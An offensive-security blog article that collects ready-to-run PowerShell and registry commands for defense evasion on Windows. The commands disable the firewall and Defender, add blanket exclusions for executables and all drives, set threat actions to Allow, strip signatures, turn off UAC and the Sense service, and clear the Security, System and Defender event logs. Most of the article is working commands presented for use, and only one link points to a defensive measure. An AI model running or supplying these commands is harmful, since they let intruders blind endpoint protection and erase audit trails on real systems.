General Defense Evasion Commands

Update: The article received a major update before it’s actual release date, clarrifying a few details, adding background info, a BlueTeam note and scripts.

General Defense Evasion Commands

At times, it will be handy to have all complementary evasion commands at hand. We tried to compile the ultimate list, without going overboard.

While this won’t disable AMSI - you need to do that before anything - it will try and disable whatever is possible. Of course, there can be setups that require doing things in a different way, maybe check our recent article on Powershell Execution Policy.

Turn off Defenses

Firewall

$ Set-NetFirewallProfile -Profile Domain,Public,Private -Enabled False
$ netsh advfirewall set allprofiles state off

Defender

When Tamper Protection is enabled, you can’t turn off Defender via Powershell, rumors has it there exists a Tamper Protection Bypass using NSudo - we’re still looking into this.

Even with Tamper Protection you should be able to bypass Defender, to be able to go the conveniant route and utilize a myriad of well-known Pentesting Tools, like Bloodhound, certipy or Lazagne, instead of writing it all yourself - for the baseline persistence you still should consider custom made or at least adapted agents that will work with AMSI enabled, after the next reboot.

Obfuscation

You can - but rarely have to - obfuscate commands, e.g. -ExclusionExtensions ".exe" may trigger and earn a generic Troyan block, even kill your shell. But the most simple obfuscations work easily. It’s worth running commands in a subshell, not only for that reason.

One-Liner - Short

We don’t recommend trying to disable Realtime Monitoring via registry, but it’s worth a shot using Powershell commands, cause that one has no negative side effects - except noise.

$ Set-MpPreference -ExclusionExtension "ps1", "exe", "com", "bat", "cmd", "scr", "pif";Add-MpPreference -ExclusionProcess "your_Payload.pif";Set-MpPreference -MAPSReporting 0;Set-MpPreference -DisableRealtimeMonitoring 1;Set-MpPreference -DisableIOAVProtection 1;Set-MPPreference -DisableBehaviorMonitoring 1;Set-MPPreference -DisableBlockAtFirstSeen 1;Set-MPPreference -DisableEmailScanning 1;Set-MPPReference -DisableScriptScanning 1;Add-MpPreference -ExclusionPath "C:\Windows\Temp", (Get-Item .).FullName;

One-Liner - Long

We left some commands in that don’t necessarily work on the most recent, latest & updatest systems. You rarely find the most recent systems outside High Security areas.

$ Set-MpPreference -ExclusionExtension "ps1", "exe", "com", "bat", "cmd", "scr", "pif", "vbs", "vbe", "js", "jse", "wsf", "wsh", "msc", "reg", "lnk", "inf", "msi", "dll", "cpl", "hta", "vb" ;Add-MpPreference -ExclusionProcess "devicecensus.exe";67..90 | Foreach-Object { $drv = [char]$_; Add-MpPreference -ExclusionPath "$($drv):\"; Add-MpPreference -ExclusionProcess "$($drv):\*" };Set-MPPReference -DisableScriptScanning 1;Set-MpPreference -DisableArchiveScanning 1;Set-MPPreference -DisableEmailScanning 1;Set-MPPreference -DisableBlockAtFirstSeen 1;Set-MPPreference -DisableBehaviourMonitoring 1;Set-MpPreference -DisableRemovableDriveScanning 1;Set-MpPreference -DisableIOAVProtection 1;Set-MpPreference -DisableRealtimeMonitoring 1;Set-MpPreference -EnableControlledFolderAccess Disabled;Set-MpPreference -DisableIntrusionPreventionSystem 1;Set-MpPreference -DisableScanningNetworkFiles 1;Set-MpPreference -DisableScanningMappedNetworkDrivesForFullScan 1;Set-MpPreference -PUAProtection disable;Set-MpPreference -MAPSReporting 0;Set-MpPreference -ScanScheduleDay 8;Add-MpPreference -ExclusionPath "C:\Windows\Temp", (Get-Item .).FullName, "$env:USERPROFILE\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup";New-ItemProperty -Path HKLM:Software\Microsoft\Windows\CurrentVersion\policies\system -Name EnableLUA -PropertyType DWord -Value 0 -Force;Set-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name DisableAntiSpyware -Value 1;Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\Sense" -Name Start -Value 4;cd "$env:USERPROFILE\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"

Individual Commands

More rough methods of AMSI evasion, like registry manipulation or low-level memory manipulation may or may not shut off Defender entirely anyways. Note that on Active Directory you’ll be very likely confronted with more severe Defenses, but: These machines are made to execute code. Even hardened systems provide at least one or two ways to do at least something, and advanced methods combined with custom code, along with Thinking Outside The Box can lead to success either way.

TL;DR: With Tamper Protection enabled your best bet is the ExclusionExtensions, followed by the ExclusionProcess - or go more sophisticated ways than using executables that are recognized by Defender.

$ Set-MpPreference -ExclusionExtension "ps1", "exe", "com", "bat", "cmd", "scr", "pif"
$ Set-MpPreference -ExclusionExtension "ps1", "exe", "com", "bat", "cmd", "scr", "pif", "vbs", "vbe", "js", "jse", "wsf", "wsh", "msc", "reg", "lnk", "inf", "msi", "dll", "cpl", "hta", "vb" 
$ Add-MpPreference -ExclusionProcess "devicecensus.exe"
$ 67..90 | Foreach-Object { $drv = [char]$_; Add-MpPreference -ExclusionPath "$($drv):\"; Add-MpPreference -ExclusionProcess "$($drv):\*" }
$ Set-MPPReference -DisableScriptScanning $true
$ Set-MpPreference -DisableArchiveScanning $true
$ Set-MPPreference -DisableEmailScanning $true
$ Set-MPPreference -DisableBlockAtFirstSeen $true
$ Set-MPPreference -DisableBehaviourMonitoring $true
$ Set-MpPreference -DisableRemovableDriveScanning $true
$ Set-MpPreference -DisableIOAVProtection $true
$ Set-MpPreference -DisableRealtimeMonitoring $true
$ Set-MpPreference -EnableControlledFolderAccess Disabled
$ Set-MpPreference -DisableIntrusionPreventionSystem $true
$ Set-MpPreference -DisableScanningNetworkFiles $true
$ Set-MpPreference -DisableScanningMappedNetworkDrivesForFullScan $true
$ Set-MpPreference -PUAProtection disable
$ Set-MpPreference -MAPSReporting 0
$ Set-MpPreference -ScanScheduleDay 8
$ Add-MpPreference -ExclusionPath "C:\Windows\Temp", (Get-Item .).FullName, "$env:USERPROFILE\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"
$ New-ItemProperty -Path HKLM:Software\Microsoft\Windows\CurrentVersion\policies\system -Name EnableLUA -PropertyType DWord -Value 0 -Force
$ Set-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name DisableAntiSpyware -Value 1
$ Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\Sense" -Name Start -Value 4
$ cd "$env:USERPROFILE\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"

ThreatDefaultAction

We found information that it’s important to always set the UnknownThreatDefaultAction, cause it’s the fallback. You can no longer set the DefaultAction to 6 for any higher Threats with Tamper Protection enabled.

$ Set-MpPreference -UnknownThreatDefaultAction Allow
$ Set-MpPreference -HighThreatDefaultAction Allow
$ Set-MpPreference -ModerateThreatDefaultAction Allow 
$ Set-MpPreference -LowThreatDefaultAction Allow 
$ Set-MpPreference -SevereThreatDefaultAction Allow 

ThreatIdDefaultAction

This still works and may come in handy, especially for known threats, like old Pentest tools. But it’s a game of chance.

$ Set-MpPreference -ThreatIDDefaultAction_Actions @(6,6) -ThreatIDDefaultAction_Ids @(2142529001,2142529002, ...)

BlueTeam

Here’s also a way for BlueTeam to deal with it:
https://blog.sec-labs.com/2023/02/tamper-protection-for-exclusions-in-defender/

Registry

Registry changes need a bit of time to reflect on the system settings, sometimes they may not show adequatly. We managed to disable Realtime Monitoring via GPO on a AD client but the switch remained in the “On” position - while our known Payload didn’t trigger and wasn’t removed. All with Tamper Protection enabled. However, the results were mixed at best, several times we weren’t able to actually trace, why / how it eventually worked. After throwing a bunch of Spagetti at the wall, some seem to have sticked. We did all of this without AMSI Evasion.

Here’s an entire script that seems to follow a similar approach. We didn’t test it, but read it carefully. Looks good (no malware, sane):
Github: jeremybeaume/disable-defender.ps1

Note: All of this is also VERY noisy, may trigger countless alerts visible to the user, etc.

Realtime Protection

Adding the keys works - but has no 100% reproducable effect. We call it a no and can’t recommend it.

$ New-Item -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" -Name "DisableRealtimeMonitoring" -Force -ErrorAction 0
$ New-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" -Name "DisableRealtimeMonitoring" -Value 1 -Force

Also this has the side-effect that Local Admin can no longer toggle the switch in the Security Settings GUI, instead the switch is grey and there’s a message “This setting is managed by your Administrator”.

Cloud Protection

Works.

$ New-Item -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name 'Spynet' -Force -ErrorAction 0
$ New-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" -Name SpynetReporting -Value 0 -PropertyType DWord -Force

Behaviour Monitoring

Didn’t test.

$ New-Item -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name 'DisableBehaviorMonitoring' -Force -ErrorAction 0
$ New-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\DisableBehaviorMonitoring" -Name DisableBehaviorMonitoring -Value 1 -PropertyType DWord -Force

Signature Updates

This is also unaffected by Tamper Protection - meaning, it should work.

$ New-Item -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name 'Spynet' -Force -ErrorAction 0
$ New-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" -Name SpynetReporting -Value 0 -PropertyType DWord -Force

Threatlevel Actions

Still working, but unsure about the effect.

$ New-Item -Path "HKLM:SOFTWARE\Policies\Microsoft\Windows Defender\Threats\" -Name 'ThreatSeverityDefaultAction' -Force -ErrorAction 0
$ New-ItemProperty -Path "HKLM:SOFTWARE\Policies\Microsoft\Windows Defender\Threats\" -Name 'Threats_ThreatSeverityDefaultAction' -Value 1 -PropertyType DWord -Force
1,2,4,5 | ForEach-Object {
    New-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" -Name $_ -Value 6 -PropertyType String -Force
}

$ New-Item -Path "HKLM:SOFTWARE\Policies\Microsoft\Windows Defender\Threats\" -Name 'ThreatIdDefaultAction' -Force 
$ New-ItemProperty -Path "HKLM:SOFTWARE\Policies\Microsoft\Windows Defender\Threats\" -Name 'Threats_ThreatIdDefaultAction' -Value 1 -PropertyType DWord -Force
$ New-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIdDefaultAction" -Name "2147519003" -Value 6 -PropertyType String -Force
$ New-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIdDefaultAction" -Name "2147717805" -Value 6 -PropertyType String -Force

Tamper Protection

Note that you cannot change Tamper Protection registry entries from Powershell or CMD, even when trying these ways:

• Running elevated Powershell as NT-Authority\System via psexec or in another way
• Through Group Policy Objects

$ New-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender\Features" -Name "TamperProtection" -Value 0 -Force
$ Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender\Features" -Name "TamperProtection" -Value 5 # to enable
$ Get-ChildItem -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender\" -Recurse

Put Registry Changes into Action

May conflict if the Domain Controller can’t be reached.

$ gpupdate /force

List all Registry Keys

and values.

$ Get-ChildItem -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender\" -Recurse | foreach-object { $_.Name }
$ Get-ChildItem -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender\" -Recurse | foreach-object { $_ } | ft
$ Get-ChildItem -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender\" -Recurse | ForEach-Object {
    $path = $_.PsPath
    Write-Host "Key: $path"
    Get-ItemProperty -Path $path | ForEach-Object {
        $_.PSObject.Properties | ForEach-Object {
            Write-Host "`t$($_.Name) = $($_.Value)"
        }
    }
}

Interesting pathes are among:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Extensions
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\IpAddresses
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\TemporaryPaths
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Features
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Features\Controls

Checking Path Details

With Tamper Protection keys like Extensions can’t be changed via Powershell by registry manipulation, however Add-MpPreference -ExclusionExtension $extensions will work fine.

$ Get-ChildItem -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender\Exclusions\" -Recurse | foreach-object { $_ }

    Hive: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions

Name                           Property
----                           --------
Extensions                     ps1 : 0
                               exe : 0
                               com : 0
                               bat : 0
                               cmd : 0
IpAddresses
Paths                          C:\Users\sshuser : 0
Processes
TemporaryPaths

We made a script that you can use to check what registry keys you can change with Tamper Protection on. This is a research script that may change your system into a weird state!
Github: test_Defender_registry.ps1

Run Powershell as System

using SysInternals psexec.exe

$ .\sysinternals\PsExec.exe -i -s -accepteula powershell.exe

Check What’s Enabled

$ Get-MpComputerStatus
$ Get-MpComputerStatus | Select RealTimeProtectionEnabled, IoavProtectionEnabled,AntispywareEnabled
$ Get-MpComputerStatus | Select IsTamperProtected,RealTimeProtectionEnabled
$ Get-MpComputerStatus | Select AntivirusEnabled
$ Get-MpPreference

Signatures

An old CTF trick is to remove all Signature Definitions - this doesn’t seem to work anymore, however we show a little workaround that you still can do.

Signature Removall -All fails

$ & "$env:ProgramW6432\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
Starting engine and signature rollback to none...Failed! Error 0x80070005

Workaround

Works partly - but, good enough still. If you keep working with exe files, battling Defender, you may want to look into commands to restore quarantined files and do other things.

$ & "$env:ProgramW6432\Windows Defender\MpCmdRun.exe" -RemoveDefinitions 
$ Set-MpPreference -SharedSignaturesPath "-"
$ Update-MpSignature
$ & "$env:ProgramW6432\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -DynamicSignatures
$ & "$env:ProgramW6432\Windows Defender\MpCmdRun.exe" -SignatureUpdate -Path "-"

Bonus - Clear Logs

$ $EventLogs = @(
  "Microsoft-Windows-Windows Defender/Operational"
  "Microsoft-Windows-Windows Defender/WHC"
  "Application"
  "Security"
  "System"
)
$ foreach ($EventLogName in $EventLogs) {  & wevtutil cl "$EventLogName" }

PIF?

.pif files, although they’re technically a shortcut from the MSDOS era, can work as standalone executable. It works the same from WSL and Windows, you can doubleclick the pif file or call it in Powershell - it will run the program.

Conclusion

As of 2024 we see more holes of Tamper Protection closed, but without special settings it’s still easy to Bypass, with only a single command. However, if the system wasn’t prepared, it seems no longer possible to remove all AV Signatures, stop the WinDefend service or permanently disable Realtime Protection, even with reboot in between.

That’s it for now, check in again for more.